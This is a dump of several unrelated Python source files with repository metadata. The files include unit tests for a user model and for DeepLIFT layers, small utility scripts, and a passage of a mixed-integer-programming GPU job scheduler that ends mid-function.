from .pygameloop import __all__
| 19.333333 | 31 | 0.810345 | 7 | 58 | 6.142857 | 0.571429 | 0.651163 | 0.930233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 58 | 2 | 32 | 29 | 0.86 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a92a54c9f1fe9f5bbfb9d73eb6f2153bbf92847a | 82 | py | Python | backend/handler/file/__init__.py | felixu1992/testing-platform | d7008343c25ec7f47acb670ae5c9b9b5f0593d63 | [
"Apache-2.0"
] | null | null | null | backend/handler/file/__init__.py | felixu1992/testing-platform | d7008343c25ec7f47acb670ae5c9b9b5f0593d63 | [
"Apache-2.0"
] | null | null | null | backend/handler/file/__init__.py | felixu1992/testing-platform | d7008343c25ec7f47acb670ae5c9b9b5f0593d63 | [
"Apache-2.0"
] | null | null | null | from backend.handler.file import file
from backend.handler.file import file_group
| 27.333333 | 43 | 0.853659 | 13 | 82 | 5.307692 | 0.461538 | 0.318841 | 0.521739 | 0.637681 | 0.927536 | 0.927536 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 82 | 2 | 44 | 41 | 0.932432 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 10 |
8d394b203aa1fda414ffca14636e53b41a89f49c | 1,697 | py | Python | _core/domain/test_user.py | pachecobruno/python-ddd | 81812848a567d4605df346ef3630718d320706cc | [
"MIT"
] | null | null | null | _core/domain/test_user.py | pachecobruno/python-ddd | 81812848a567d4605df346ef3630718d320706cc | [
"MIT"
] | null | null | null | _core/domain/test_user.py | pachecobruno/python-ddd | 81812848a567d4605df346ef3630718d320706cc | [
"MIT"
] | null | null | null | from uuid import uuid4, UUID
from datetime import datetime
from core.domain.user import User
first_name = 'Bruno'
last_name = 'Pacheco'
alias = 'brunopacheco'
email = 'bruno@hubbe.co'
password = 'mypass123'
account = uuid4()
date = datetime.utcnow()
def test_user_model_init():
user = User(
first_name=first_name,
last_name=last_name,
alias=alias,
email=email,
password=password,
account=account
)
assert UUID(str(user.uuid), version=4)
assert user.first_name == first_name
assert user.last_name == last_name
assert user.alias == alias
assert user.email == email
assert user.password == password
assert user.account == account
assert user.public_key.split('.')[1] == user.uuid
assert user.secret_key.split('.')[0] == 'sk'
assert user.settings == {}
assert user.created_at < date
assert user.updated_at < date
def test_account_model_from_dict():
user = User.from_dict(
{
'first_name': first_name,
'last_name': last_name,
'alias': alias,
'email': email,
'password': password,
'account': account,
# 'settings': {},
}
)
assert UUID(str(user.uuid), version=4)
assert user.first_name == first_name
assert user.last_name == last_name
assert user.alias == alias
assert user.email == email
assert user.password == password
assert user.account == account
assert user.public_key.split('.')[1] == user.uuid
assert user.secret_key.split('.')[0] == 'sk'
assert user.settings == {}
assert user.created_at < date
assert user.updated_at < date
| 25.712121 | 53 | 0.62581 | 210 | 1,697 | 4.895238 | 0.204762 | 0.214008 | 0.070039 | 0.070039 | 0.745136 | 0.741245 | 0.741245 | 0.741245 | 0.741245 | 0.741245 | 0 | 0.008703 | 0.255156 | 1,697 | 65 | 54 | 26.107692 | 0.804589 | 0.008839 | 0 | 0.444444 | 0 | 0 | 0.058929 | 0 | 0 | 0 | 0 | 0 | 0.444444 | 1 | 0.037037 | false | 0.092593 | 0.055556 | 0 | 0.092593 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
8d3bbd9098b4696c51428e56b999cfc184a440cc | 34 | py | Python | languages/python.py | LCordial/github-rainbow | 0897daaca6a2e73ddd2ba6aa60aff694c9a1a94d | [
"MIT"
] | 3 | 2022-03-28T03:47:25.000Z | 2022-03-28T04:34:03.000Z | languages/python.py | LCordial/github-rainbow | 0897daaca6a2e73ddd2ba6aa60aff694c9a1a94d | [
"MIT"
] | 1 | 2022-03-30T00:31:24.000Z | 2022-03-30T00:31:24.000Z | languages/python.py | LCordial/the-helloworld-encyclopedia | 0897daaca6a2e73ddd2ba6aa60aff694c9a1a94d | [
"MIT"
] | null | null | null | #28/03/2022
print("Hello World"); | 11.333333 | 21 | 0.676471 | 6 | 34 | 3.833333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.258065 | 0.088235 | 34 | 3 | 21 | 11.333333 | 0.483871 | 0.294118 | 0 | 0 | 0 | 0 | 0.458333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
8d740b25523aef072420efe600a56846fbcbc132 | 65 | py | Python | polls/generator.py | sebnorth/extended_user | 2107011fcbf1d380361af73787ef02f24c2d2850 | [
"BSD-3-Clause"
] | null | null | null | polls/generator.py | sebnorth/extended_user | 2107011fcbf1d380361af73787ef02f24c2d2850 | [
"BSD-3-Clause"
] | null | null | null | polls/generator.py | sebnorth/extended_user | 2107011fcbf1d380361af73787ef02f24c2d2850 | [
"BSD-3-Clause"
] | null | null | null | import random
def randomf():
return random.randint(1, 100)
| 13 | 33 | 0.692308 | 9 | 65 | 5 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 0.2 | 65 | 4 | 34 | 16.25 | 0.788462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
572f644caf6b040f5f3bb6d2ec7463593ef72f0b | 7,158 | py | Python | tests/layers/test_deeplift_genomics_default_mode.py | ViktorvdValk/deeplift | 9ac739ea5b7a14135b4f2d468b5a738edfe92eba | [
"MIT"
] | 640 | 2016-06-01T02:41:38.000Z | 2022-03-25T15:19:15.000Z | tests/layers/test_deeplift_genomics_default_mode.py | ViktorvdValk/deeplift | 9ac739ea5b7a14135b4f2d468b5a738edfe92eba | [
"MIT"
] | 95 | 2016-09-07T07:31:08.000Z | 2022-03-21T21:43:57.000Z | tests/layers/test_deeplift_genomics_default_mode.py | ViktorvdValk/deeplift | 9ac739ea5b7a14135b4f2d468b5a738edfe92eba | [
"MIT"
] | 165 | 2016-06-09T17:59:56.000Z | 2022-03-30T15:15:36.000Z | from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import unittest
from unittest import skip
from nose.tools import raises
import sys
import os
import numpy as np
np.random.seed(1234)
import deeplift.layers as layers
from deeplift.util import compile_func
from deeplift.layers import ConvMxtsMode, DenseMxtsMode, NonlinearMxtsMode
from deeplift.layers.convolutional import PaddingMode, PoolMode
class TestDense(unittest.TestCase):
def test_relu_after_dense(self):
input_layer = layers.Input(batch_shape=(None,4))
dense_layer = layers.Dense(kernel=np.random.random((4,2)),
bias=np.random.random((2,)),
dense_mxts_mode=DenseMxtsMode.Linear)
dense_layer.set_inputs(input_layer)
relu_after_dense = layers.ReLU(nonlinear_mxts_mode=
NonlinearMxtsMode.DeepLIFT_GenomicsDefault)
relu_after_dense.set_inputs(dense_layer)
relu_after_dense.build_fwd_pass_vars()
self.assertEqual(relu_after_dense.nonlinear_mxts_mode,
NonlinearMxtsMode.RevealCancel)
def test_relu_after_dense_batchnorm_noop_noop(self):
input_layer = layers.Input(batch_shape=(None,4))
dense_layer = layers.Dense(kernel=np.random.random((4,2)),
bias=np.random.random((2,)),
dense_mxts_mode=DenseMxtsMode.Linear)
dense_layer.set_inputs(input_layer)
batch_norm = layers.BatchNormalization(
gamma=np.array([1.0, 1.0]).astype("float32"),
beta=np.array([-0.5, 0.5]).astype("float32"),
axis=-1,
mean=np.array([-0.5, 0.5]).astype("float32"),
var=np.array([1.0, 1.0]).astype("float32"),
epsilon=0.001)
batch_norm.set_inputs(dense_layer)
noop_layer1 = layers.NoOp()
noop_layer1.set_inputs(batch_norm)
noop_layer2 = layers.NoOp()
noop_layer2.set_inputs(noop_layer1)
relu_after_bn = layers.ReLU(nonlinear_mxts_mode=
NonlinearMxtsMode.DeepLIFT_GenomicsDefault)
relu_after_bn.set_inputs(noop_layer2)
relu_after_bn.build_fwd_pass_vars()
self.assertEqual(relu_after_bn.nonlinear_mxts_mode,
NonlinearMxtsMode.RevealCancel)
def test_relu_after_conv1d(self):
input_layer = layers.Input(batch_shape=(None,2,2))
conv_layer = layers.Conv1D(
kernel=np.random.random((2,2,2)).astype("float32"),
bias=np.random.random((2,)).astype("float32"),
conv_mxts_mode=ConvMxtsMode.Linear,
stride=1,
padding=PaddingMode.valid)
conv_layer.set_inputs(input_layer)
relu_after_conv = layers.ReLU(nonlinear_mxts_mode=
NonlinearMxtsMode.DeepLIFT_GenomicsDefault)
relu_after_conv.set_inputs(conv_layer)
relu_after_conv.build_fwd_pass_vars()
self.assertEqual(relu_after_conv.nonlinear_mxts_mode,
NonlinearMxtsMode.Rescale)
def test_relu_after_conv1d_batchnorm(self):
input_layer = layers.Input(batch_shape=(None,2,2))
conv_layer = layers.Conv1D(
kernel=np.random.random((2,2,2)).astype("float32"),
bias=np.random.random((2,)).astype("float32"),
conv_mxts_mode=ConvMxtsMode.Linear,
stride=1,
padding=PaddingMode.valid)
conv_layer.set_inputs(input_layer)
batch_norm = layers.BatchNormalization(
gamma=np.array([1.0, 1.0]).astype("float32"),
beta=np.array([-0.5, 0.5]).astype("float32"),
axis=-1,
mean=np.array([-0.5, 0.5]).astype("float32"),
var=np.array([1.0, 1.0]).astype("float32"),
epsilon=0.001)
batch_norm.set_inputs(conv_layer)
relu_after_bn = layers.ReLU(nonlinear_mxts_mode=
NonlinearMxtsMode.DeepLIFT_GenomicsDefault)
relu_after_bn.set_inputs(batch_norm)
relu_after_bn.build_fwd_pass_vars()
self.assertEqual(relu_after_bn.nonlinear_mxts_mode,
NonlinearMxtsMode.Rescale)
def test_relu_after_conv2d(self):
input_layer = layers.Input(batch_shape=(None,2,2,2))
conv_layer = layers.Conv2D(
kernel=np.random.random((2,2,2,2)).astype("float32"),
bias=np.random.random((2,)).astype("float32"),
conv_mxts_mode=ConvMxtsMode.Linear,
strides=(1,1),
padding=PaddingMode.valid,
data_format="channels_last")
conv_layer.set_inputs(input_layer)
relu_after_conv = layers.ReLU(
nonlinear_mxts_mode=
NonlinearMxtsMode.DeepLIFT_GenomicsDefault)
relu_after_conv.set_inputs(conv_layer)
relu_after_conv.build_fwd_pass_vars()
self.assertEqual(relu_after_conv.nonlinear_mxts_mode,
NonlinearMxtsMode.Rescale)
def test_relu_after_conv2d_batchnorm(self):
input_layer = layers.Input(batch_shape=(None,2,2,2))
conv_layer = layers.Conv2D(
kernel=np.random.random((2,2,2,2)).astype("float32"),
bias=np.random.random((2,)).astype("float32"),
conv_mxts_mode=ConvMxtsMode.Linear,
strides=(1,1),
padding=PaddingMode.valid,
data_format="channels_last")
conv_layer.set_inputs(input_layer)
batch_norm = layers.BatchNormalization(
gamma=np.array([1.0, 1.0]).astype("float32"),
beta=np.array([-0.5, 0.5]).astype("float32"),
axis=-1,
mean=np.array([-0.5, 0.5]).astype("float32"),
var=np.array([1.0, 1.0]).astype("float32"),
epsilon=0.001)
batch_norm.set_inputs(conv_layer)
relu_after_bn = layers.ReLU(nonlinear_mxts_mode=
NonlinearMxtsMode.DeepLIFT_GenomicsDefault)
relu_after_bn.set_inputs(batch_norm)
relu_after_bn.build_fwd_pass_vars()
self.assertEqual(relu_after_bn.nonlinear_mxts_mode,
NonlinearMxtsMode.Rescale)
@raises(RuntimeError)
def test_relu_after_other_layer(self):
input_layer = layers.Input(batch_shape=(None,4))
relu_layer = layers.ReLU(
nonlinear_mxts_mode=
NonlinearMxtsMode.DeepLIFT_GenomicsDefault)
relu_layer.set_inputs(input_layer)
relu_layer.build_fwd_pass_vars()
| 48.364865 | 80 | 0.583403 | 791 | 7,158 | 4.982301 | 0.121365 | 0.070794 | 0.056077 | 0.112154 | 0.832276 | 0.822634 | 0.815529 | 0.813245 | 0.803096 | 0.752093 | 0 | 0.033627 | 0.318664 | 7,158 | 147 | 81 | 48.693878 | 0.774452 | 0 | 0 | 0.724638 | 0 | 0 | 0.023191 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 1 | 0.050725 | false | 0.050725 | 0.094203 | 0 | 0.152174 | 0.007246 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
93bbeee184833d8c0253fa96b40d4744b7077186 | 110 | py | Python | clases.py | Danieldevop/Python-examples | 9ff038c80c6a2edc82ffafbf74a33084d64ff7a8 | [
"MIT"
] | null | null | null | clases.py | Danieldevop/Python-examples | 9ff038c80c6a2edc82ffafbf74a33084d64ff7a8 | [
"MIT"
] | null | null | null | clases.py | Danieldevop/Python-examples | 9ff038c80c6a2edc82ffafbf74a33084d64ff7a8 | [
"MIT"
] | null | null | null | class numeros:
def sumar(self, a,b):
return a + b
def restar(self,a,b):
return a - b
| 18.333333 | 26 | 0.518182 | 18 | 110 | 3.166667 | 0.5 | 0.140351 | 0.210526 | 0.421053 | 0.491228 | 0.491228 | 0 | 0 | 0 | 0 | 0 | 0 | 0.363636 | 110 | 5 | 27 | 22 | 0.814286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.4 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
93c78cd8f0eb6887c149f92ad5e051daf6abdfad | 167 | py | Python | python_2_modules/python_tester.py | chendaniely/2016-11-03-nsbe-workshop | 68cc68002ade2d91e9a9ea5659a65a68a4eb5bdb | [
"MIT"
] | null | null | null | python_2_modules/python_tester.py | chendaniely/2016-11-03-nsbe-workshop | 68cc68002ade2d91e9a9ea5659a65a68a4eb5bdb | [
"MIT"
] | null | null | null | python_2_modules/python_tester.py | chendaniely/2016-11-03-nsbe-workshop | 68cc68002ade2d91e9a9ea5659a65a68a4eb5bdb | [
"MIT"
] | null | null | null | import python_script as ps
assert(ps.c2f(0) == 32)
assert(ps.c2f(100) == 212)
assert(ps.k2c(273.15) == 0)
assert(ps.k2c(0) == -273.15)
assert(ps.k2f(273.15) == 32)
| 16.7 | 28 | 0.634731 | 33 | 167 | 3.181818 | 0.454545 | 0.380952 | 0.209524 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227586 | 0.131737 | 167 | 9 | 29 | 18.555556 | 0.496552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.833333 | 1 | 0 | true | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
93ef5fb8caaade525a6585770c906fa1cce7c157 | 35,425 | py | Python | code/alg/scheduler/solver.py | S-Lab-System-Group/ChronusArtifact | bc7e15fefd53b80d1897170ab3c1aa7d353c3b79 | [
"MIT"
] | 7 | 2021-11-04T06:31:38.000Z | 2022-02-08T11:46:42.000Z | code/alg/scheduler/solver.py | S-Lab-System-Group/ChronusArtifact | bc7e15fefd53b80d1897170ab3c1aa7d353c3b79 | [
"MIT"
] | null | null | null | code/alg/scheduler/solver.py | S-Lab-System-Group/ChronusArtifact | bc7e15fefd53b80d1897170ab3c1aa7d353c3b79 | [
"MIT"
] | 1 | 2022-01-10T01:42:42.000Z | 2022-01-10T01:42:42.000Z | from mip import *
import numpy as np
import copy
import math
def compute_maximum_lease(expect_maximum_end_time, lease_time_interval, cur_lease_index):
return math.floor(expect_maximum_end_time / lease_time_interval) - cur_lease_index
# return math.ceil(expect_maximum_end_time / lease_time_interval) - cur_lease_index
def compute_emergence(expected_remaining_time, true_remaining_time, required_gpu_num):
# return -1 * true_remaining_time * required_gpu_num
# return -expected_remaining_time * required_gpu_num
# return 1 * true_remaining_time * required_gpu_num
return -1 * true_remaining_time * required_gpu_num
class NoPreemptMIPSolver(object):
def __init__(self, method):
self.method = method
def batch_fast_check_if_packable(self, required_resource_list, required_block_list, maximum_block_list, existing_solution, resource_num_list):
if len(maximum_block_list) == 0:
return True, copy.deepcopy(existing_solution)
maximum_block = max(maximum_block_list)
solution = list()
for i in range(maximum_block):
if i < len(existing_solution):
solution.append(existing_solution[i])
else:
solution.append(resource_num_list[i])
resource_tuple_list = [(a, b, c) for a, b, c in zip(maximum_block_list, required_block_list, required_resource_list)]
# resource_tuple_list.sort(key=lambda e: (e[0], e[1], -e[2]))
# resource_tuple_list.sort(key=lambda e: (e[1], e[0], e[2]))
resource_tuple_list.sort(key=lambda e: (e[0]-e[1], e[1], e[2]))
for maximum_block, required_block, required_resource in resource_tuple_list:
if True:
feasible, cnt = False, 0
# for i in range(maximum_block):
for i in range(maximum_block - 1, -1, -1):
if solution[i] >= required_resource:
cnt += 1
solution[i] -= required_resource
if cnt == required_block:
feasible = True
break
if not feasible: break
if False:
feasible = False
index_block = -1
for i in range(maximum_block - 1, required_block, -1):
doable = True
for j in range(i, i - required_block - 1, -1):
if solution[j] < required_resource:
doable = False
if doable:
index_block = i
break
if index_block == -1: break
feasible = True
for i in range(index_block, index_block - required_block - 1, -1):
solution[i] -= required_resource
return feasible, solution
def batch_fast_job_selection(self, required_resource_list, required_block_list, maximum_block_list, existing_solution, resource_num_list):
if len(maximum_block_list) == 0:
return True, list()
maximum_block = max(maximum_block_list)
solution = list()
for i in range(maximum_block):
if i < len(existing_solution):
solution.append(existing_solution[i])
else:
solution.append(resource_num_list[i])
solution_matrix = [i for i in range(len(maximum_block_list))]
resource_tuple_list = [(a, b, c, i) for a, b, c, i in zip(maximum_block_list, required_block_list, required_resource_list, solution_matrix)]
# resource_tuple_list.sort(key=lambda e: (e[1], e[0], e[2]))
# resource_tuple_list.sort(key=lambda e: (e[0], e[1], -e[2]))
resource_tuple_list.sort(key=lambda e: (e[0]-e[1], e[1], e[2]))
for maximum_block, required_block, required_resource, idx in resource_tuple_list:
feasible, cnt = False, 0
cache_solution = [0 for _ in range(maximum_block)]
# for i in range(maximum_block - 1, -1, -1):
if True:
for i in range(maximum_block - 1, -1, -1):
# for i in range(0, maximum_block):
if solution[i] >= required_resource:
cnt += 1
solution[i] -= required_resource
cache_solution[i] = 1
if cnt == required_block:
feasible = True
break
if not feasible: break
if False:
index_block = -1
for i in range(maximum_block - 1, required_block, -1):
feasible = True
for j in range(i, i - required_block - 1, -1):
if solution[j] < required_resource:
feasible = False
if feasible:
index_block = i
break
if index_block == -1:
feasible = False
break
for i in range(index_block, index_block - required_block - 1, -1):
solution[i] -= required_resource
cache_solution[i] = 1
solution_matrix[idx] = cache_solution
feasible = True
return feasible, solution_matrix
class MIPSolver(object):
def __init__(self, method):
self.method = method
def check_if_packable(self, required_resource_list, required_block_list, maximum_block_list, resource_num_list, method):
if method == 'knapsack':
maximum_block = max(maximum_block_list)
m = Model(solver_name=GRB)
var_len = len(required_resource_list) * maximum_block
X = [m.add_var(var_type=BINARY) for i in range(len(required_resource_list) * maximum_block)]
m.objective = maximize(X[-1])
# job-wise
for i in range(len(required_resource_list)):
m += xsum(X[j] for j in range(i * maximum_block, i * maximum_block + maximum_block_list[i])) == required_block_list[i]
if maximum_block_list[i] < maximum_block:
m += xsum(X[j] for j in range(i * maximum_block + maximum_block_list[i], (i+1) * maximum_block)) == 0
# resource-wise
for i in range(maximum_block):
m += xsum(X[j] * required_resource_list[j // maximum_block] for j in range(i, var_len, maximum_block) ) <= resource_num_list[i]
m.optimize()
feasible = not any([X[i].x is None for i in range(var_len)])
solution = list()
if feasible:
for block_idx in range(maximum_block):
left_resource_num = resource_num_list[resource_num_list]
for var_idx in range(block_idx, var_len, maximum_block):
left_resource_num -= X[var_idx].x * required_resource_list[var_idx // maximum_block]
solution.append(left_resource_num)
elif method == 'greedy':
maximum_block = max(maximum_block_list)
solution = [resource_num_list[i] for i in range(maximum_block)]
resource_tuple_list = [(a, b, c) for a, b, c in zip(maximum_block_list, required_block_list, required_resource_list)]
resource_tuple_list.sort(reverse=True)
for maximum_block, required_block, required_resource in resource_tuple_list:
feasible, cnt = False, 0
for i in range(maximum_block - 1, -1, -1):
if solution[i] >= required_resource:
cnt += 1
solution[i] -= required_resource
if cnt == required_block:
feasible = True
break
if not feasible: break
elif method == 'greedy-smooth':
maximum_block = max(maximum_block_list)
solution = [resource_num_list[i] for i in range(maximum_block)]
resource_tuple_list = [(a, b, c) for a, b, c in zip(maximum_block_list, required_block_list, required_resource_list)]
resource_tuple_list.sort(key=lambda e: (e[0] - e[1], -e[0], -e[2]))
for maximum_block, required_block, required_resource in resource_tuple_list:
feasible, cnt = False, 0
# idx_resource_pair = sorted([(idx, resource) for idx, resource in enumerate(solution)], key=lambda e: (e[1], e[0]), reverse=True)
idx_resource_pair = sorted([(idx, resource) for idx, resource in enumerate(solution)], key=lambda e: (e[0], e[1]), reverse=True)
for idx, resource in idx_resource_pair:
if idx < maximum_block and resource >= required_resource:
cnt += 1
solution[idx] -= required_resource
if cnt == required_block:
feasible = True
break
if not feasible: break
return feasible, solution
def fast_check_if_packable(self, required_resource, required_block, maximum_block, existing_solution, resource_num_list):
if required_block > maximum_block: return False, existing_solution
feasible_block = 0
if len(existing_solution) < maximum_block:
existing_solution += [resource_num_list[i] for i in range(len(existing_solution), maximum_block)]
for i in range(maximum_block):
if existing_solution[i] >= required_resource:
feasible_block += 1
feasible = feasible_block >= required_block
if feasible:
for i in range(maximum_block - 1, -1, -1):
if existing_solution[i] >= required_resource and required_block > 0:
existing_solution[i] -= required_resource
required_block -= 1
return feasible, existing_solution
def fast_job_cache_solution(self, required_resource_list, required_block_list, maximum_block_list,
existing_solution, resource_num_list):
if len(maximum_block_list) == 0:
return True, copy.deepcopy(existing_solution), None
maximum_block = max(maximum_block_list)
solution = list()
for i in range(maximum_block):
if i < len(existing_solution):
solution.append(existing_solution[i])
else:
solution.append(resource_num_list[i])
required_resource, required_block, maximum_block = required_resource_list[-1], required_block_list[-1], maximum_block_list[-1]
# fast job cache solution
cache_solution = [0 for _ in range(maximum_block)]
feasible, cnt = False, 0
for i in range(maximum_block - 1, -1, -1):
if solution[i] >= required_resource:
cnt += 1
solution[i] -= required_resource
cache_solution[i] = 1
if cnt == required_block:
feasible = True
break
if not feasible:
return feasible, None, None
required_resource_list, required_block_list, maximum_block_list = required_resource_list[:-1], required_block_list[:-1], maximum_block_list[:-1]
resource_tuple_list = [(a, b, c) for a, b, c in zip(maximum_block_list, required_block_list, required_resource_list)]
resource_tuple_list.sort(key=lambda e: (-e[2], e[0] - e[1], -e[0]))
for maximum_block, required_block, required_resource in resource_tuple_list:
feasible, cnt = False, 0
for i in range(maximum_block - 1, -1, -1):
if solution[i] >= required_resource:
cnt += 1
solution[i] -= required_resource
if cnt == required_block:
feasible = True
break
if not feasible: break
return feasible, solution, cache_solution
def batch_fast_check_if_packable(self, soft_list, value_list, soft_id_list, required_resource_list, required_block_list, maximum_block_list, in_block_list, existing_solution, resource_num_list):
if len(maximum_block_list) == 0:
return True, copy.deepcopy(existing_solution)
maximum_block = max(maximum_block_list)
solution = list()
for i in range(maximum_block):
if i < len(existing_solution):
solution.append(existing_solution[i])
else:
solution.append(resource_num_list[i])
resource_tuple_list = [(a, b, c, job) for a, b, c, job in zip(maximum_block_list, required_block_list, required_resource_list, in_block_list)]
resource_tuple_list.sort(key=lambda e: (-e[2], e[0] - e[1], -e[0]))
visit_list = list()
for maximum_block, required_block, required_resource, job in resource_tuple_list:
if job['job_id'] not in visit_list:
visit_list.append(job['job_id'])
else:
continue
feasible, cnt = False, 0
for i in range(maximum_block - 1, -1, -1):
if solution[i] >= required_resource:
cnt += 1
solution[i] -= required_resource
if cnt == required_block:
feasible = True
break
if not feasible: break
return feasible, solution
def batch_fast_job_selection(self, soft_list, value_list, soft_id_list, required_resource_list, required_block_list, maximum_block_list, in_block_list, existing_solution, resource_num_list):
if len(maximum_block_list) == 0:
return True, list(), list()
maximum_block = max(maximum_block_list)
solution = list()
for i in range(maximum_block):
if i < len(existing_solution):
solution.append(existing_solution[i])
else:
solution.append(resource_num_list[i])
solution_matrix = [i for i in range(len(maximum_block_list))]
soft_matrix = [0 for i in range(len(maximum_block_list))]
resource_tuple_list = [(a, b, c, i, soft_id, value, job) for a, b, c, i, soft_id, value, job in zip(maximum_block_list, required_block_list, required_resource_list, solution_matrix, soft_id_list, value_list, in_block_list)]
resource_tuple_list.sort(key=lambda e: (-e[-2], -e[2], e[0] - e[1], -e[0]))
visit_list = list()
for maximum_block, required_block, required_resource, idx, soft_id, value, job in resource_tuple_list:
if job['job_id'] in visit_list:
continue
feasible, cnt = False, 0
cache_solution = [0 for _ in range(maximum_block)]
for i in range(maximum_block - 1, -1, -1):
if solution[i] >= required_resource:
cnt += 1
solution[i] -= required_resource
cache_solution[i] = 1
if cnt == required_block:
feasible = True
break
if feasible:
solution_matrix[idx] = cache_solution
soft_matrix[idx] = 1
visit_list.append(job['job_id'])
if not feasible:
for i in range(maximum_block - 1, -1, -1):
if cache_solution[i] == 1:
solution[i] += required_resource
for job in in_block_list:
if job['job_id'] not in visit_list:
import pdb; pdb.set_trace()
return False, list(), list()
return feasible, solution_matrix, soft_matrix
# @timeout_decorator.timeout()
def job_selection(self, soft_list, value_list, soft_id_list, required_resource_list, required_block_list, maximum_block_list, resource_num_list, objective, max_seconds=5):
# info = {
# 'required_resource_list': required_resource_list,
# 'required_block_list' : required_block_list,
# 'maximum_block_list': maximum_block_list,
# 'resource_num_list': resource_num_list,
# 'objective': objective
# }
# np.save("info.npy", info)
max_resource_num = 1.0 * max(resource_num_list)
maximum_block = max(maximum_block_list)
if isinstance(resource_num_list, int):
resource_num_list = [resource_num_list for _ in range(maximum_block)]
m = Model(solver_name=GRB)
var_len = len(required_resource_list) * maximum_block
X = [m.add_var(var_type=BINARY) for i in range(len(required_resource_list) * maximum_block)]
S = [m.add_var(var_type=BINARY) for i in range(len(required_resource_list))]
obj_list = [S[j] * value_list[j] for j in range(len(required_resource_list))]
if objective == 'random':
obj_list = [S[0] * value_list[0]]
# pass
# m.objective = maximize(X[-1])
elif objective == 'minimize':
for j in range(0, var_len, maximum_block):
obj_list.append(-X[j] * required_resource_list[j // maximum_block] / max_resource_num)
elif objective == 'maximize':
for j in range(0, var_len, maximum_block):
obj_list.append(X[j] * required_resource_list[j // maximum_block] / max_resource_num)
# m.objective = maximize(xsum(X[j] * required_resource_list[j // maximum_block] for j in range(0, var_len, maximum_block)) )
# m.objective = maximize(xsum(X[j] for j in range(0, var_len, maximum_block)) )
else:
raise NotImplementedError
m.objective = maximize(xsum(obj_list[i] for i in range(len(obj_list))))
# job-wise
for i in range(len(required_resource_list)):
m += xsum(X[j] for j in range(i * maximum_block, i * maximum_block + maximum_block_list[i])) == S[i] * required_block_list[i]
if maximum_block_list[i] < maximum_block:
m += xsum(X[j] for j in range(i * maximum_block + maximum_block_list[i], (i+1) * maximum_block)) == 0
# resource-wise
for i in range(maximum_block):
# m += xsum(X[j] * required_resource_list[j // maximum_block] * S[j // maximum_block] for j in range(i, var_len, maximum_block) ) <= resource_num_list[i] * S[j // maximum_block]
m += xsum(X[j] * required_resource_list[j // maximum_block] for j in range(i, var_len, maximum_block) ) <= resource_num_list[i] # * S[j // maximum_block]
i = 0
while i < len(required_resource_list):
if soft_id_list[i] != 0:
i += 1
continue
left = i
right = len(required_resource_list)
for j in range(i+1, len(required_resource_list)):
if soft_id_list[j] == 0:
right = j
break
